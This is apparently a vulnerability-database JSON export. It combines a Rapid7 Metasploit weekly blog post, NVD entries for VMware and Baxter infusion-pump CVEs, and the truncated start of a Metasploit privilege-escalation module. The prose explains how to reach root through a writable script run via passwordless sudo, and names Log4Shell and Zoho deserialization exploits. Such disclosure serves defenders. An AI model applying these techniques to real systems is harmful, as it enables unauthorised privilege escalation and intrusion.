"baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T15:13:15", "type": "rapid7blog", "title": "CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-31660", "CVE-2022-31661"], "modified": "2022-08-05T15:13:15", "id": "RAPID7BLOG:2C118F02F42DB14EC4F6AF30FFB72A76", "href": "https://blog.rapid7.com/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T20:01:16", "description": "## Log4Shell in MobileIron Core\n\n\n\nThanks to [jbaines-r7](<https://github.com/jbaines-r7>) we have yet another Log4Shell [exploit](<https://github.com/rapid7/metasploit-framework/pull/16837>). Similar to the other Log4Shell exploit modules, the exploit works by sending a JNDI string that once received by the server will be deserialized, resulting in unauthenticated remote code execution as the `tomcat` user. 
Vulnerable versions of MobileIron Core have been reported as [exploited](<https://www.mandiant.com/resources/mobileiron-log4shell-exploitation>) in the wild.\n\n## VMware Workspace ONE Access LPE\n\nOur very own [Spencer McIntyre](<https://github.com/zeroSteiner>) discovered and added a local privilege escalation [module](<https://github.com/rapid7/metasploit-framework/pull/16854>) for [CVE-2022-31660](<https://www.rapid7.com/blog/post/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/>) in VMware Workspace ONE Access. By default, the `horizon` user has write permissions to the `/opt/vmware/certproxy/bin/cert-proxy.sh` script, and the `sudo` configuration does not require supplying a password when invoking the script. Due to this, an attacker can write arbitrary code to the `/opt/vmware/certproxy/bin/cert-proxy.sh` script and escalate their privileges to that of the `root` user by executing the `certproxyService.sh` with `sudo`. Because the `horizon` user runs the externally-facing web application in VMware Workspace ONE Access, [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>) can be leveraged for initial access to the target.\n\n## XML-RPC Unauthenticated RCE in Zoho Password Manager\n\n[Grant Willcox](<https://github.com/gwillcox-r7>) of the Metasploit team added a [module](<https://github.com/rapid7/metasploit-framework/pull/16852>) that exploits a deserialization flaw in Zoho Password Manager Pro. 
Sending a single POST request containing XML-RPC data to the `/xmlrpc` endpoint will result in unauthenticated code execution as `NT AUTHORITY\\SYSTEM`.\n\n## New module content (5)\n\n * [Cisco PVC2300 POE Video Camera configuration download](<https://github.com/rapid7/metasploit-framework/pull/16857>) by Craig Heffner and Erik Wynter - This adds a module targeting Cisco PVC2300 IP Cameras that will download the configuration file using hard-coded credentials.\n * [BACnet Scanner](<https://github.com/rapid7/metasploit-framework/pull/16788>) by Paz - This adds a new scanner module that discovers BACnet devices on the network and extracts model name, software version, firmware revision, and device description. Once the data is processed, it is displayed on screen and saved to a local xml file.\n * [MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16837>) by RageLtMan, Spencer McIntyre, jbaines-r7, and rwincey, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>) \\- This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is an unauthenticated remote code execution in the context of the web application user.\n * [VMware Workspace ONE Access CVE-2022-31660](<https://github.com/rapid7/metasploit-framework/pull/16854>) by Spencer McIntyre, which exploits [CVE-2022-31660](<https://attackerkb.com/topics/GUT2CbttnF/cve-2022-31660?referrer=blog>) \\- This module exploits CVE-2022-31660, an LPE disclosed by VMware in VMSA-2022-0021. 
The underlying flaw is that the /opt/vmware/certproxy/bin/cert-proxy.sh script is writable by the horizon user who can also indirectly execute it by invoking the certproxyService.sh script via sudo which is permitted without a password, enabling escalation to root.\n * [Zoho Password Manager Pro XML-RPC Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/16852>) by Grant Willcox, Vinicius, and Y4er, which exploits [CVE-2022-35405](<https://attackerkb.com/topics/9IKNFYh9Wl/cve-2022-35405?referrer=blog>) \\- This PR adds in an exploit module for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE as SYSTEM.\n\n## Enhancements and features (3)\n\n * [#16833](<https://github.com/rapid7/metasploit-framework/pull/16833>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This PR adds an option to the host command to make it easier to delete host tags.\n * [#16840](<https://github.com/rapid7/metasploit-framework/pull/16840>) from [bcoles](<https://github.com/bcoles>) \\- This replaces some Meterpreter-only method calls with method calls that check the session type, which allows non-Meterpreter sessions to use read_profile_list \nand load_missing_hives. Also, this changes read_profile_list to be able to read profile information for all accounts.\n * [#16858](<https://github.com/rapid7/metasploit-framework/pull/16858>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates ZeroLogon to have better error handling in the check method. 
This will cause the error from an invalid NetBIOS name to be reported with a meaningful message.\n\n## Bugs fixed (8)\n\n * [#16820](<https://github.com/rapid7/metasploit-framework/pull/16820>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This PR fixes an issue in the ldap_query module where the module would fail if the datastore option \"action\" wasn't set.\n * [#16822](<https://github.com/rapid7/metasploit-framework/pull/16822>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug in `Rex::Ui::Text::Input::Buffer::BufferSock` that was causing data to be occasionally lost due to the rsock monitor routine stopping abruptly.\n * [#16825](<https://github.com/rapid7/metasploit-framework/pull/16825>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- The IMAP credential capture module did not appropriately handle literal strings as specified by RFC3501. The code has been updated to handle these strings efficiently.\n * [#16832](<https://github.com/rapid7/metasploit-framework/pull/16832>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This fix removes an unnecessary echo statement from the ms10_092_schelevator module.\n * [#16839](<https://github.com/rapid7/metasploit-framework/pull/16839>) from [bcoles](<https://github.com/bcoles>) \\- Fixes shell_registry_enumvals/getvaldata error checking.\n * [#16844](<https://github.com/rapid7/metasploit-framework/pull/16844>) from [bcoles](<https://github.com/bcoles>) \\- This PR updates the `post/multi/gather` module to support non-meterpreter sessions like shell and powershell.\n * [#16846](<https://github.com/rapid7/metasploit-framework/pull/16846>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Updates `auxiliary/scanner/ssh/ssh_login` to gracefully handle `Errno::EPIPE` exceptions.\n * [#16848](<https://github.com/rapid7/metasploit-framework/pull/16848>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Fix a crash when updating session information in Meterpreter.\n\n## 
Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.10...6.2.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-07-29T13%3A06%3A04-05%3A00..2022-08-04T11%3A39%3A27-05%3A00%22>)\n * [Full diff 6.2.10...6.2.11](<https://github.com/rapid7/metasploit-framework/compare/6.2.10...6.2.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-05T18:50:07", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", 
"CVE-2022-22954", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-35405"], "modified": "2022-08-05T18:50:07", "id": "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9", "href": "https://blog.rapid7.com/2022/08/05/metasploit-weekly-wrap-up-170/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-03T14:40:27", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. A malicious actor with local access can escalate privileges to 'root'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31661", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31661"], "modified": "2022-08-11T16:11:00", "cpe": ["cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:access_connector:21.08.0.0", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", 
"cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:identity_manager:3.3.4"], "id": "CVE-2022-31661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31661", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:40:13", "description": "The Baxter Spectrum WBM does not perform mutual authentication with the gateway server host. 
This may allow an attacker to perform a man in the middle attack that modifies parameters making the network connection fail.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2022-09-09T15:15:00", "type": "cve", "title": "CVE-2022-26394", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.8, "vectorString": "AV:A/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26394"], "modified": "2022-09-16T16:47:00", "cpe": ["cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17d19", "cpe:/o:baxter:sigma_spectrum_35700bax_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:20d32", "cpe:/o:baxter:sigma_spectrum_35700bax2_firmware:-", "cpe:/o:baxter:baxter_spectrum_iq_35700bax3_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16d38", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16"], "id": "CVE-2022-26394", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26394", "cvss": {"score": 4.8, "vector": "AV:A/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:baxter:sigma_spectrum_35700bax2_firmware:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16d38:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:20d32:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:sigma_spectrum_35700bax_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:baxter_spectrum_iq_35700bax3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17d19:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:40:27", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contains a privilege escalation vulnerability. A malicious actor with local access can escalate privileges to 'root'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31660", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-11T16:10:00", "cpe": ["cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:access_connector:21.08.0.0", 
"cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:identity_manager:3.3.4"], "id": "CVE-2022-31660", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31660", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:40:14", "description": "The Baxter Spectrum Wireless Battery Module (WBM) stores network credentials and PHI (only applicable to Spectrum IQ pumps using auto programming) in unencrypted form. 
An attacker with physical access to a device that hasn't had all data and settings erased may be able to extract sensitive information.", "cvss3": {"exploitabilityScore": 0.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.2, "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-09T15:15:00", "type": "cve", "title": "CVE-2022-26390", "cwe": ["CWE-311"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.2, "vectorString": "AV:L/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26390"], "modified": "2022-09-15T16:46:00", "cpe": ["cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17d19", "cpe:/o:baxter:sigma_spectrum_35700bax_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:22d28", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:20d32", "cpe:/o:baxter:sigma_spectrum_35700bax2_firmware:-", "cpe:/o:baxter:baxter_spectrum_iq_35700bax3_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16d38", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16"], "id": "CVE-2022-26390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26390", "cvss": {"score": 1.2, "vector": "AV:L/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": 
["cpe:2.3:o:baxter:sigma_spectrum_35700bax2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16d38:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:20d32:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:sigma_spectrum_35700bax_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:baxter_spectrum_iq_35700bax3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17d19:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:22d28:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:40:13", "description": "The Baxter Spectrum WBM (v16, v16D38) and Baxter Spectrum WBM (v17, v17D19, v20D29 to v20D32) when in superuser mode is susceptible to format string attacks via application messaging. An attacker could use this to read memory in the WBM to access sensitive information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-09T15:15:00", "type": "cve", "title": "CVE-2022-26392", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, 
"impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26392"], "modified": "2022-09-15T16:45:00", "cpe": ["cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17d19", "cpe:/o:baxter:sigma_spectrum_35700bax_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:20d32", "cpe:/o:baxter:sigma_spectrum_35700bax2_firmware:-", "cpe:/o:baxter:baxter_spectrum_iq_35700bax3_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16d38", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16"], "id": "CVE-2022-26392", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26392", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:baxter:sigma_spectrum_35700bax2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16d38:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:20d32:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:sigma_spectrum_35700bax_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:baxter_spectrum_iq_35700bax3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17d19:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:40:13", "description": "The Baxter Spectrum WBM is susceptible to format string attacks via application messaging. 
An attacker could use this to read memory in the WBM to access sensitive information or cause a Denial of Service (DoS) on the WBM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-09-09T15:15:00", "type": "cve", "title": "CVE-2022-26393", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26393"], "modified": "2022-09-15T15:50:00", "cpe": ["cpe:/o:baxter:spectrum_wireless_battery_module_firmware:20d29", "cpe:/o:baxter:baxter_spectrum_iq_35700bax3_firmware:-", "cpe:/o:baxter:sigma_spectrum_35700bax_firmware:-", "cpe:/o:baxter:sigma_spectrum_35700bax2_firmware:-"], "id": "CVE-2022-26393", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26393", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:20d29:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:sigma_spectrum_35700bax_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:baxter_spectrum_iq_35700bax3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:sigma_spectrum_35700bax2_firmware:-:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2023-06-03T15:00:33", 
"description": "VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T00:00:00", "type": "zdt", "title": "VMware Workspace ONE Access Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-05T00:00:00", "id": "1337DAY-ID-37891", "href": "https://0day.today/exploit/description/37891", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Unix\n\n TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'VMware 
